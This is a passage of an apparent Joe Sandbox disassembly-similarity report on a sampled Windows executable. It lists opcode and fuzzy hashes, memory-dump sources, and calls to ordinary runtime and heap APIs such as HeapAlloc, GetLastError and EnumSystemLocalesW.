                                                                                                                                                                          • Opcode ID: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                          • Instruction ID: e9527739ae3ee7d354d75e07a65108931f3be07d7b7dc55af34454fdcdad6380
                                                                                                                                                                          • Opcode Fuzzy Hash: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                          • Instruction Fuzzy Hash: 63012872F0928586E7106F19E851FB9B2E1EB547A4F82A331D239436F4EF3C94818711
                                                                                                                                                                          APIs
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7ABC58D1B,?,?,?,?,?,?,?,?,00000000,00007FF7ABC636B0), ref: 00007FF7ABC588C3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnumLocalesSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2099609381-0
                                                                                                                                                                          • Opcode ID: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
                                                                                                                                                                          • Instruction ID: e83c908ba0ff2aab89b1aa4d33cf6c48b5b9d9bda9923dcb8f9d671319eacf59
                                                                                                                                                                          • Opcode Fuzzy Hash: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
                                                                                                                                                                          • Instruction Fuzzy Hash: 73F08172705B4183E700EB69F8809A9B3A2FB88B80F958135EA0E83374DE3CD961C350
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: gfffffff
                                                                                                                                                                          • API String ID: 0-1523873471
                                                                                                                                                                          • Opcode ID: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
                                                                                                                                                                          • Instruction ID: b4f649a371ea4c2c8b7e35fa4f7a5b0d3c7bb9a999b09625c55cbacbc94968a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f27753b35af301423d3a8abf2b7d21ce5d1fdb4b65858ed45011b93d0387abc
                                                                                                                                                                          • Instruction Fuzzy Hash: 70A16962A0A7C546EB21DF2AA040BBDBB91EB54B84F869231EE4D477B1DE3DE401C711
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
                                                                                                                                                                          • Instruction ID: c142b42a86932d42a0dbcaad1f823c9c82659f9bad93c37579e34879d19e68fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 45b205b7bf844638de4d5f403b2ffdc69b950a8dfccd93f16d3896cfea9d530a
                                                                                                                                                                          • Instruction Fuzzy Hash: C3B1B07290AB8185E7649F2DC05863CBBB2E745F48F660235EA4E473B5CF39D691C720
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00007FF7ABC5EDC1
                                                                                                                                                                            • Part of subcall function 00007FF7ABC587C4: HeapAlloc.KERNEL32(?,?,00000000,00007FF7ABC5715E,?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?), ref: 00007FF7ABC58819
                                                                                                                                                                            • Part of subcall function 00007FF7ABC58340: RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
                                                                                                                                                                            • Part of subcall function 00007FF7ABC58340: GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360
                                                                                                                                                                            • Part of subcall function 00007FF7ABC66E8C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC66EBF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 916656526-0
                                                                                                                                                                          • Opcode ID: ecddaea97533682daabd926574219ac8eb77d9012c04aab06203c2af1d380149
                                                                                                                                                                          • Instruction ID: 71ec983367cfe10ad0c18aff90ab0c0c2e0e466d317391dd58623a48f09d4f11
                                                                                                                                                                          • Opcode Fuzzy Hash: ecddaea97533682daabd926574219ac8eb77d9012c04aab06203c2af1d380149
                                                                                                                                                                          • Instruction Fuzzy Hash: F4412721F5B34341EB60BF1A6491F7AE681AF95BC0F824635EE4D47BB5DE3CE0408220
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Value is not convertible to double.
                                                                                                                                                                          • API String ID: 0-3791697403
                                                                                                                                                                          • Opcode ID: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
                                                                                                                                                                          • Instruction ID: 8d61052960c2ee02cdfb60ef28844965f08e3b7b71b34656d8554a8312281063
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ba565c77fdc33f98ca61690d12cdd307a771652d8fb550acc70161f8b7d49a6
                                                                                                                                                                          • Instruction Fuzzy Hash: A0310725E1988242FEA6F73CE0767B9D351BFCA700FD54032D64E16AB5EE2CE205CA10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                          • Opcode ID: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                          • Instruction ID: f1bd3445ba371cc42319086de681ea5753335aacbff849b3aa7752b3106d3d45
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0DB09220F07A06D2EA083B696C42B1462A47F48710FC68038C00D91330EF2C21E58B20
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
                                                                                                                                                                          • Instruction ID: 4b9a0118b4e0b8c12ec4466192fec595c2672bcbb0835f9856ce006ccef83d91
                                                                                                                                                                          • Opcode Fuzzy Hash: f12877a7773debabcfe14841abf0feb695a7b79a1a8abed41c0c36458b70f125
                                                                                                                                                                          • Instruction Fuzzy Hash: 18D11E22A0964282EB789F2D8158A7DB7A2EF45B48F961135CE0D076F6CF3EE645C350
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4023145424-0
                                                                                                                                                                          • Opcode ID: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
                                                                                                                                                                          • Instruction ID: a630d4f908661259c205ddcd6dc6e8714c94f2e06ae93d31a3dfb5d7f3fa9dee
                                                                                                                                                                          • Opcode Fuzzy Hash: f344d2a9087d21eca618563a8aa5b07c7537fb2cee8b4c4ba50660566b3eea24
                                                                                                                                                                          • Instruction Fuzzy Hash: 73C10C25A4968245F760AB69D890BBAA7A0FF94788FC14231DE8D877F9DF3CD541C310
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cd06edce539a298007fbae6a2eff5b2dc8a17c3ec41319af2def5e4589d67cdd
                                                                                                                                                                          • Instruction ID: 64a7f22ae55b99bf3214b2c85c566a5db45f3d2add512e6177a0140d9d11213d
                                                                                                                                                                          • Opcode Fuzzy Hash: cd06edce539a298007fbae6a2eff5b2dc8a17c3ec41319af2def5e4589d67cdd
                                                                                                                                                                          • Instruction Fuzzy Hash: C2915932B1A24746FB2C6E2D9508BBAD692AF40784F870538DE5E477F0DD3CE6059728
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1500699246-0
                                                                                                                                                                          • Opcode ID: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
                                                                                                                                                                          • Instruction ID: 4fbac9e4714a55fde4ecd5d6d09334e48521afe42f395ee66c9df825effb4835
                                                                                                                                                                          • Opcode Fuzzy Hash: 895bb8ed2e54a99e93314a1315de34fb1fdc1139edf3237d566104dcff8b7434
                                                                                                                                                                          • Instruction Fuzzy Hash: C7B11B32A0968681E764BF2DD421EB9B3A0FBC8B48F815231DA59836F5DF3CE541C761
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 06dee4fbac220f9cebe0ed687281eeebc667da011f0934cc1e0eb333a3493343
                                                                                                                                                                          • Instruction ID: 06ba3fbf37acdb011e7815d3845616dae496e3dd47348861d9ac0923e5b1201e
                                                                                                                                                                          • Opcode Fuzzy Hash: 06dee4fbac220f9cebe0ed687281eeebc667da011f0934cc1e0eb333a3493343
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C81B372A06A0186EB64EE29D4C1B7D67A0FB84B94F814736DE1D977B4DF38D041C320
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: db771d61744b3cceb6fbab89a6039f45d1916131a150eaded8e8d11ce27dfc7d
                                                                                                                                                                          • Instruction ID: fa7054330b5fd9d9c32cf8d4d0fdf9ae8fc421107e06bf8bfe5116dde25456e3
                                                                                                                                                                          • Opcode Fuzzy Hash: db771d61744b3cceb6fbab89a6039f45d1916131a150eaded8e8d11ce27dfc7d
                                                                                                                                                                          • Instruction Fuzzy Hash: 3081D3B2A497C145E774EB1E94C0B7AAA90FB45B94F914335EA8E43BB5DE3CE4408B10
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: ebfe3d440fb28f2ae5af58a9e06a7af5b8c10f2a3410b4cc546c6d87b04cfe0b
                                                                                                                                                                          • Instruction ID: dbade05e60bc89d0c74ce23fd6e2c001c4b0c534d5e5b563b0a925ae093f91f4
                                                                                                                                                                          • Opcode Fuzzy Hash: ebfe3d440fb28f2ae5af58a9e06a7af5b8c10f2a3410b4cc546c6d87b04cfe0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 53610B62F9E39246FB64AA2C84C0F79E6C1AF50760F960335DA5E427F1DE7DE8508720
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                                                                                                                          • Instruction ID: ba3e79fab2976e36eb7b4bf40615a9d8c53f32456c0e88aa33cdb304517c464d
                                                                                                                                                                          • Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                                                                                                                          • Instruction Fuzzy Hash: B051F972A19A9182E7249B1CD00877CB3A2EB44F58F655131EE4D077B4CB3AED83CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                                                                          • Instruction ID: 2daa06a56a8a2b38b97384834f088d8abcdbf828401da49fa7c561e51e78fe3c
                                                                                                                                                                          • Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                                                                          • Instruction Fuzzy Hash: F651C732A1969186E7249B2DC04873CB7A2EB44F58F655131EE4C077B8DB3AED83C750
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                                                                          • Instruction ID: 277582daaf33e54c89a132b4c4d2923e4774ef4647635b2d98537b362c15177e
                                                                                                                                                                          • Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                                                                          • Instruction Fuzzy Hash: 0951A676A1969186E7249B2CC048A38B7B2EB44F58F658131EE4D077B4CB3AED83C750
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                          • Opcode ID: 6a1170061ed6777565a4c3a49d3fe330b274c8fadf215cc03b81de6b857595c2
                                                                                                                                                                          • Instruction ID: 186a626bb3400f96952d04470a175de9e508b86cdd94b1ef7a439d173267d957
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a1170061ed6777565a4c3a49d3fe330b274c8fadf215cc03b81de6b857595c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 3541F432715A5482EF04DF6AD954979B3A2FB88FD0B8A9136DE0E87B74DE3CC0418300
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
